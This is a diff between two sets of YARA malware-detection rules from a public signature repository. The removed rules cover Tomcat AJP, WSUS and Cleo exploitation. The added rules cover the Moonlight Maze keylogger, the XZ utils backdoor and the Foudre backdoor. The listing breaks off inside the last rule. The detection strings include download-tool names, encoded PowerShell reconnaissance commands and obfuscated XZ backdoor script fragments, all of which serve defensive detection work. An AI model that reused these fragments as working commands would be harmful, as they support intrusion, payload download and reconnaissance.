+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Xk_Keylogger
 {
 	meta:
-		description = "Detects a possibly active and vulnerable Tomcat configuration that includes an accessible and unprotected AJP connector (you can ignore backup files or files that are not actively used)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d23af7ce-eb5d-50aa-be02-b4bf858641c2"
-		date = "2020-02-28"
-		modified = "2023-12-05"
-		reference = "https://www.chaitin.cn/en/ghostcat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2020_1938.yar#L2-L23"
+		description = "Rule to detect Moonlight Maze 'xk' keylogger"
+		author = "Kaspersky Lab"
+		id = "cf585cd0-afdd-5782-a6e5-bb9509cbf01d"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L170-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "902b469c8a31add2254e8d5ade6bc22f1bc0a2b10ea70f3131f0640f2900e667"
-		score = 50
-		quality = 85
-		tags = "FILE"
+		logic_hash = "b2acdef9c8e545f4ab217f529a7e4a3e74723b27ec89896f98639fd40792bcc8"
+		score = 75
+		quality = 35
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$h1 = "<?xml "
-		$a1 = "<Service name=\"Catalina\">" ascii
-		$v1 = "<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"/>" ascii
-		$fp1 = "<!--<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"" ascii
-		$fp2 = " secret=\"" ascii
-		$fp3 = " requiredSecret=\"" ascii
+		$a1 = "Log ended at => %s"
+		$a2 = "Log started at => %s [pid %d]"
+		$a3 = "/var/tmp/task" fullword
+		$a4 = "/var/tmp/taskhost" fullword
+		$a5 = "my hostname: %s"
+		$a6 = "/var/tmp/tasklog"
+		$a7 = "/var/tmp/.Xtmp01" fullword
+		$a8 = "myfilename=-%s-"
+		$a9 = "/var/tmp/taskpid"
+		$a10 = "mypid=-%d-" fullword
+		$a11 = "/var/tmp/taskgid" fullword
+		$a12 = "mygid=-%d-" fullword
 
 	condition:
-		$h1 at 0 and filesize <= 300KB and $a1 and $v1 and not 1 of ( $fp* )
+		(( 3 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_Themebleed_Theme_Sep23 : FILE
+rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Encrypted_Keylog : FILE
 {
 	meta:
-		description = "Detects domain or IP placement in Windows theme files"
-		author = "@m_haggis, @nas_bench"
-		id = "76d0042b-655d-5d03-bcc4-150ebc92eb43"
-		date = "2023-09-13"
-		modified = "2023-12-05"
-		reference = "https://github.com/gabe-k/themebleed"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2023_38146.yar#L1-L17"
+		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
+		author = "Kaspersky Lab"
+		id = "f0d464f0-3955-5f41-a57f-8aa225e1171d"
+		date = "2017-03-27"
+		modified = "2017-03-27"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L204-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "577003741f07aeffafd2b0b22913de44ea4f5ed264f4104ee013104355f65311"
+		logic_hash = "593f6f2148ddb52e2beee72a48135cd83f126edfdb263b471432d17273e536db"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = /Path=\\\\[0-9a-zA-Z\.-]{1,20}\\/
-		$s2 = "[VisualStyles]"
-		$s3 = "[Theme]"
+		$a1 = {47 01 22 2A 6D 3E 39 2C}
 
 	condition:
-		filesize < 1MB and all of them
+		uint32( 0 ) == 0x2a220147 and ( $a1 at 0 )
 }
-rule SIGNATURE_BASE_EXPL_WSUS_Exploitation_Indicators_Oct25 : CVE_2025_59287
+rule SIGNATURE_BASE_BKDR_Xzutil_Script_CVE_2024_3094_Mar24_1 : CVE_2024_3094
 {
 	meta:
-		description = "Detects indicators related to the exploitation of the Windows Server Update Services (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)"
+		description = "Detects make file and script contents used by the backdoored XZ library (xzutil) CVE-2024-3094."
 		author = "Florian Roth"
-		id = "ae27e91c-7d77-5204-9ebd-5e8cb8673b68"
-		date = "2025-10-25"
-		modified = "2025-12-05"
-		reference = "https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_wsus_cve_2025_59287.yar#L1-L27"
+		id = "6b62ffc2-d0a7-5810-97a3-c48f7fac300e"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04487cca15f4151bfc31279fd58dc6898e59149cabb6dbef08c1df88418ab904"
-		score = 75
+		hash = "d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3"
+		logic_hash = "8d3f5f078a5c827208e04acb7ac1496f473e1236f92561f94d2a3c8156c68ea6"
+		score = 80
 		quality = 85
-		tags = "CVE-2025-59287"
+		tags = "CVE-2024-3094"
 
 	strings:
-		$sl1 = "at System.Data.DataSet.DeserializeDataSetSchema(SerializationInfo info, StreamingContext context" ascii wide
-		$sl2 = "at System.Runtime.Serialization.ObjectManager.DoFixups()" ascii wide
-		$sl3 = "at System.Runtime.Serialization.ObjectManager.CompleteISerializableObject" ascii wide
-		$sl4 = "System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation." ascii wide
-		$sl5 = "ErrorWsusService.9HmtWebServices.CheckReportingWebServiceReporting WebService WebException:System.Net.WebException: Unable to connect to the remote server" ascii wide
-		$se1 = "powershell -ec try{$r= (&{echo https://" ascii wide base64 base64wide
-		$se2 = ":8531; net user /domain; ipconfig " ascii wide base64 base64wide
-		$sa1 = "whoami;net user /domain" ascii wide base64 base64wide
-		$sa2 = "net user /domain; ipconfig /all" ascii wide base64 base64wide
+		$x1 = "/bad-3-corrupt_lzma2.xz | tr " ascii
+		$x2 = "/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|" ascii
+		$x3 = "eval $zrKcKQ" ascii
 
 	condition:
-		all of ( $sl* ) or 1 of ( $se* ) or all of ( $sa* )
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_EXPL_WSUS_Exploitation_POC_Oct25 : CVE_2025_59287 FILE
+rule SIGNATURE_BASE_BKDR_Xzutil_Binary_CVE_2024_3094_Mar24_1 : CVE_2024_3094 FILE
 {
 	meta:
-		description = "Detects POC for the exploitation of the Windows Server Update Services (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)"
+		description = "Detects injected code used by the backdoored XZ library (xzutil) CVE-2024-3094."
 		author = "Florian Roth"
-		id = "a48741cb-cdd0-51ea-b7e9-278f16990bf0"
-		date = "2025-10-26"
-		modified = "2025-12-05"
-		reference = "https://github.com/jiansiting/CVE-2025-59287/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_wsus_cve_2025_59287.yar#L29-L47"
+		id = "6ccdeb6d-67c4-5358-a76b-aef7f047c997"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L19-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ade02afa7449f0bfcd82065a4246a598bedb46c561bf721b6bf1325fe0fc6239"
+		logic_hash = "ed364484ff598b0818f9b3249673e684b52394c25b14e47fbca25a5f96ecc970"
 		score = 75
 		quality = 85
-		tags = "CVE-2025-59287, FILE"
+		tags = "CVE-2024-3094, FILE"
+		hash1 = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
+		hash2 = "605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4"
+		hash3 = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
+		hash4 = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
+		hash5 = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
+		hash6 = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049"
 
 	strings:
-		$sa1 = "/SimpleAuthWebService/SimpleAuth.asmx"
-		$sa2 = "/ReportingWebService/ReportingWebService.asmx"
-		$sa3 = "/ClientWebService/Client.asmx"
-		$sa4 = "/ReportingWebService/ReportingWebService.asmx"
-		$sb1 = "xsi:type=\"SOAP-ENC:base64\">"
+		$op1 = { 48 8d 7c 24 08 f3 ab 48 8d 44 24 08 48 89 d1 4c 89 c7 48 89 c2 e8 ?? ?? ?? ?? 89 c2 }
+		$op2 = { 31 c0 49 89 ff b9 16 00 00 00 4d 89 c5 48 8d 7c 24 48 4d 89 ce f3 ab 48 8d 44 24 48 }
+		$op3 = { 4d 8b 6c 24 08 45 8b 3c 24 4c 8b 63 10 89 85 78 f1 ff ff 31 c0 83 bd 78 f1 ff ff 00 f3 ab 79 07 }
+		$xc1 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }
 
 	condition:
-		filesize < 20MB and all of ( $sa* ) and $sb1
+		uint16( 0 ) == 0x457f and ( all of ( $op* ) or $xc1 )
 }
-rule SIGNATURE_BASE_CVE_2015_1674_CNGSYS : CVE_2015_1674 FILE
+rule SIGNATURE_BASE_BKDR_Xzutil_Killswitch_CVE_2024_3094_Mar24_1 : CVE_2024_3094
 {
 	meta:
-		description = "Detects exploits for CVE-2015-1674"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1161b395-a19e-5aac-8416-8a4e60aeca37"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "http://www.binvul.com/viewthread.php?tid=508"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_1674.yar#L10-L28"
+		description = "Detects kill switch used by the backdoored XZ library (xzutil) CVE-2024-3094."
+		author = "Florian Roth"
+		id = "0d28bec4-1d3a-5af0-9e9e-49486fcc62e1"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#gistcomment-5006558"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L48-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
-		logic_hash = "d751ef739a6fb8b0871f92cb4aba21544f444944710407c723f0452dc3b85522"
-		score = 75
+		logic_hash = "b2024d4b8346c4f74524bb7f3c6b2850684c19471a00e6fa60fff1c41e4a86b6"
+		score = 85
 		quality = 85
-		tags = "CVE-2015-1674, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2024-3094"
 
 	strings:
-		$s1 = "\\Device\\CNG" wide
-		$s2 = "GetProcAddress" fullword ascii
-		$s3 = "LoadLibrary" ascii
-		$s4 = "KERNEL32.dll" fullword ascii
-		$s5 = "ntdll.dll" fullword ascii
+		$x1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		$x1
 }
-rule SIGNATURE_BASE_APT28_Hospitalitymalware_Document : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_SH_Indicators_Mar24_1 : FILE
 {
 	meta:
-		description = "Yara Rule for APT28_Hospitality_Malware document identification"
-		author = "CSE CybSec Enterprise - Z-Lab"
-		id = "722e80ef-d729-5887-9853-cd06128f506d"
-		date = "2017-10-02"
-		modified = "2023-12-05"
-		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_hospitality.yar#L3-L18"
+		description = "Detects characteristics found in obfuscated script (used in the backdoored XZ package, but could match on others, too)"
+		author = "Florian Roth"
+		id = "f9fcc326-75d6-5a5a-a8b5-7de15a11448e"
+		date = "2024-04-06"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/bkdr_xz_util_cve_2024_3094.yar#L62-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "33c69e03e00c90dc0b673cdb042f8f979552086414bda9c9f17f3785214b05af"
-		score = 75
+		logic_hash = "b5abf8184e0b1b18ccc513e00e9db241b4983923ae97f495396d73f0fb162192"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
 
 	strings:
-		$a = {75 52 B9 ED 1B D6 83 0F DB 24 CA 87 4F 5F 25 36 BF 66 BA}
-		$b = {EC 3B 6D 74 5B C5 95 F3 9E 24 5B FE 4A 64 C7 09 CE 07 C9 58 4E 62 3B}
+		$s1 = "eval $"
 
 	condition:
-		all of them and filesize > 75KB and filesize < 82KB
+		uint8( 1 ) == 0x3d and $s1 in ( filesize -20 .. filesize )
 }
-
-rule SIGNATURE_BASE_APT28_Hospitalitymalware_Mvtband_File
+rule SIGNATURE_BASE_Foudre_Backdoor_1 : FILE
 {
 	meta:
-		description = "Yara Rule for mvtband.dll malware"
-		author = "CSE CybSec Enterprise - Z-Lab"
-		id = "f9e34c77-38b3-513e-bb29-148ac7058596"
-		date = "2017-10-02"
+		description = "Detects Foudre Backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ab2d43f4-fc35-5980-9b5d-98c5c4cfd012"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_hospitality.yar#L20-L33"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5da333444e7c9f023d9c6d8d1dec617859efdb26f9f6bc41e22ef27d2e3059a"
+		logic_hash = "e42959162017ddf6da1d0b2950096e93e0e98c3e5f88ae28fc48e82ef98ca87b"
 		score = 75
 		quality = 85
-		tags = ""
-		tlp = "white"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
+		hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
 
 	strings:
-		$a = "DGMNOEP"
-		$b = {C7 45 94 0A 25 73 30 8D 45 94}
+		$s1 = "initialization failed: Reinstall the program" fullword wide
+		$s2 = "SnailDriver V1" fullword wide
+		$s3 = "lp.ini" fullword wide
 
 	condition:
-		all of them and pe.sections [ 2 ] . raw_data_size == 0
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_Log_Indicators_Dec24 : SCRIPT
+rule SIGNATURE_BASE_Foudre_Backdoor_Dropper_1 : FILE
 {
 	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "385042a9-fc8c-5b50-975f-3436a16e6861"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L2-L16"
+		description = "Detects Foudre Backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38c7d05b-d545-53c5-8db7-a7925b5b7838"
+		date = "2017-08-01"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a7e6713a08d7cce00cffba8daa12b251ccc12dc8d5a5f38d568bd5054e3783a2"
+		logic_hash = "77ae856e74ceb04e73c26154d7b4cf98ed0e1d8b9ac6ed78775becbff2473e13"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "FILE"
+		hash1 = "6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac"
+		hash2 = "da228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5"
 
 	strings:
-		$x1 = "Note: Processing autorun file 'autorun\\health" ascii wide
-		$x2 = "60282967-dc91-40ef-a34c-38e992509c2c.xml" ascii wide
-		$x3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
+		$x1 = "536F594A96C5496CB3949A4DA4775B576E049C57696E646F77735C43757272656E7456657273696F6E5C5C52756E" fullword wide
+		$x2 = "2220263024C380B3278695851482EC32" fullword wide
+		$s1 = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\\\Startup\\" wide
+		$s2 = "C:\\Documents and Settings\\All Users\\" wide
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\\Shell Folders" wide
+		$s4 = "ShellExecuteW" fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them ) )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_1 : FILE
+
+rule SIGNATURE_BASE_Foudre_Backdoor_Component_1 : FILE
 {
 	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "81daf184-4c38-5d84-899b-9d0de2f39934"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L18-L52"
+		description = "Detects Foudre Backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9070f581-64a7-5620-aff4-7f2cbd73099d"
+		date = "2017-08-01"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L53-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "481ddd570d0292036b421223ce0f839ece86cc1a97aa226a8b9fbd1d63905d1b"
+		logic_hash = "2eb267ab93c297101aef0cfcca78d0299ca7baa96b983a5f2ff547394cbac82d"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "786951478a0fc5db24f6e1d8dcc5eaa8880dbd928da97828a61f1f1f0f21e21d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4"
+		hash2 = "db605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109"
 
 	strings:
-		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
-		$sa2 = "<Mark date=" ascii
-		$sa3 = "<Event>" ascii
-		$sa4 = "<Command text" ascii
-		$sb1 = "[System.Net.WebRequest]::create" ascii
-		$sb2 = "Invoke-RestMethod" ascii
-		$sb3 = "Invoke-WebRequest" ascii
-		$sb4 = "iwr " ascii
-		$sb5 = "Net.WebClient" ascii
-		$sb6 = "Resume-BitsTransfer" ascii
-		$sb7 = "Start-BitsTransfer" ascii
-		$sb8 = "wget " ascii
-		$sb9 = "WinHttp.WinHttpRequest" ascii
-		$sb10 = ".DownloadFile(" ascii
-		$sb11 = ".DownloadString(" ascii
-		$sb12 = "Bypass" nocase ascii
-		$sb13 = "-EncodedCommand" ascii
-		$sb14 = "-windowstyle hidden" ascii
-		$sb15 = " -enc " ascii
+		$s1 = { 50 72 6F 6A 65 63 74 31 2E 64 6C 6C 00 44 31 }
+		$s2 = "winmgmts:\\\\localhost\\root\\SecurityCenter2" fullword wide
+		$s3 = "C:\\Documents and Settings\\All Users\\" wide
 
 	condition:
-		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 3 of them ) or ( 2 of them and pe.exports ( "D1" ) ) )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_2 : FILE
+rule SIGNATURE_BASE_Foudre_Backdoor_SFX : FILE
 {
 	meta:
-		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "d215d4a0-1726-58d4-90df-8ec6102effe1"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L54-L89"
+		description = "Detects Foudre Backdoor SFX"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b5c7cd6b-48c8-5703-b695-19d226de1810"
+		date = "2017-08-01"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_foudre.yar#L77-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8debaf2c85ea63501b7a3c2ff8af7a8484f4d6097e073645d808cbd50ef1511a"
-		score = 70
+		logic_hash = "dd5492f5314cb87fdb7c8b29bdf31e1fcd8541ed47b20f309538437d9c6ac600"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
+		hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
 
 	strings:
-		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
-		$sa2 = "<Mark date=" ascii
-		$sa3 = "<Event>" ascii
-		$sa4 = "<Command text" ascii
-		$sb1 = "wscript" ascii
-		$sb2 = "cscript" ascii
-		$sb3 = "mshta" ascii
-		$sb4 = "certutil" ascii
-		$sb5 = "pwsh" ascii
-		$sb6 = "curl" ascii
-		$sb7 = "msiexec" ascii
-		$sb8 = "taskkill" ascii
-		$sb9 = "regsvr32" ascii
-		$sb10 = "rundll32" ascii
-		$sb11 = "bitsadmin" ascii
-		$sb12 = "whoami" ascii
-		$sb13 = "bcdedit" ascii
-		$sb14 = "systeminfo" ascii
-		$sb15 = "reg " ascii
-		$sb16 = "schtasks" ascii
+		$s1 = "main.exe" fullword ascii
+		$s2 = "pub.key" fullword ascii
+		$s3 = "WinRAR self-extracting archive" fullword wide
 
 	condition:
-		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_XML_Indicators_Dec24 : FILE
+rule SIGNATURE_BASE_Exp_EPS_CVE20152545 : CVE_2015_2545 FILE
 {
 	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "Florian Roth"
-		id = "622633af-aa7a-5bf9-a59c-6590535d86a4"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L91-L109"
+		description = "Detects EPS Word Exploit CVE-2015-2545"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9a5f0554-b588-5b82-93df-0fdfba2af2da"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "Internal Research - ME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2545.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21c11c3e0c0ffea89e24b9c002b6112a46b4dc7c2c4f1f5dc9803758a68efc36"
+		logic_hash = "e1aac80a06dd71352d2776b4dfccce901d47363459853a37669af69be6e962c7"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2015-2545, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<Host alias=\"60282967-dc91-40ef-a34c-38e992509c2c\" application=\"\" " ascii
-		$s1 = "<Commands>SYSTEM cmd.exe /c " ascii
-		$a1 = "<Action actiontype=\"Commands\" " ascii
+		$s1 = "word/media/image1.eps" ascii
+		$s2 = "-la;7(la+" ascii
 
 	condition:
-		filesize < 50KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x4b50 and ( $s1 and #s2 > 20 )
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_1 : FILE
+rule SIGNATURE_BASE_Apt3_Bemstour_Strings : FILE
 {
 	meta:
-		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
-		author = "X__Junior"
-		id = "b30ca09f-b84c-5de8-9bf7-9f3269f32c1f"
-		date = "2024-12-10"
-		modified = "2024-12-12"
-		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L112-L146"
+		description = "Detects strings used by the Bemstour exploitation tool"
+		author = "Mark Lechtik"
+		id = "8b76e10a-040f-505e-9dff-cd0a689b121e"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L1-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c9be15aec57fdde62815ee04daa5616940ab7949784d382a4825dce9f1e28568"
-		score = 70
-		quality = 83
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
+		logic_hash = "8aa7491b1dc3595f67ae1229d33f79261616b0f27485b7a27705db63a6111c07"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		hash1 = "b103f708e85416fc6d7af9605da4b57b3abe42fb9c6c9ec0f539b4c877580bd2"
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$sa1 = "<Action actiontype=\"Commands\"" ascii
-		$sa2 = "<?xml version=" ascii
-		$sa3 = "<Runninglocalrequired>" ascii
-		$sa4 = "<Autostartup>" ascii
-		$sb1 = "[System.Net.WebRequest]::create" ascii
-		$sb2 = "Invoke-RestMethod" ascii
-		$sb3 = "Invoke-WebRequest" ascii
-		$sb4 = "iwr " ascii
-		$sb5 = "Net.WebClient" ascii
-		$sb6 = "Resume-BitsTransfer" ascii
-		$sb7 = "Start-BitsTransfer" ascii
-		$sb8 = "wget " ascii
